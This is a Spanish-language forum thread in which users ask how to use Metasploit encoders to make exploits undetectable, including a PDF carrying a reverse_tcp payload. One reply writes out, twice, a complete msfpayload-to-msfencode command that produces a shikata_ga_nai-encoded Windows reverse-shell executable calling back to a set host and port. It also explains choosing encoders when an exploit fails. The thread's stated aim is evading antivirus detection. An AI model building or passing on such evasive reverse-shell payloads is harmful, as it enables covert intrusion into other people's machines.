Encoders de Metasploit

(1/1)

illera88:
Pues lo dicho. ¿Cómo se usal los encoders de metasploit para hacer indetectables nuestros exploits?
¿Se pude hacer indetectabel con el msf un pdf con un exploit incrustado y con un payload reverse_tcp??

Un saludo

Shell Root:
mmm Los Encoders son usandos de 2 formás!

1. Dentro de la consola Shell de Linux (Pará ver las opciones ejecutar ./msfencode -h)
Código:

shell@Alex:~/msf3$ ./msfencode -h

y para usarlo con un archivo binario. Así:
Código:

shell@Alex:~/msf3$ ./msfpayload windows/shell_reverse_tcp LHOST=172.0.0.1 LPORT=1234 R | ./msfencode -e x86/shikata_ga_nai -t exe > /home/shellroot/Archivo_Codificado1.exe

2. Al momento de lanzar un Exploit
En ocasiones al momento de lanzar un exploit, nos saldra un hermoso mensaje de... Exploit failed: No encoders encoded the buffer successfully... ahora para solucionar este failed, ejecutamos show encoders, para visualizar los que son soportados por el exploit, y despues, SET Nombre_Encoder.


Con respecto a la otra duda, de encodear un archivo *.PDF, no tengo ni la más minima idea... xD

alexkof158:
vale tenia en mente esto, seria en vez de poner aaa.exe poner el dd.pdf no?? a ver si se podra encodear este archivo? 

Shell Root:
Lo dudo alexkof158, ya que estamos refiriendonos a un Ejecutable. Mirad...
Código:

shell@Alex:~/msf3$ ./msfpayload windows/shell_reverse_tcp LHOST=172.0.0.1 LPORT=1234 R | ./msfencode -e x86/shikata_ga_nai -t exe > /home/shellroot/Archivo_Codificado1.exe
En la siguiente cadena, nos referimos a un Archivo Ejecutable
Código:

shell@Alex:~/msf3$  [...] exe > /home/shellroot/Archivo_Codificado1.exe

Navegación

[0] Índice de Mensajes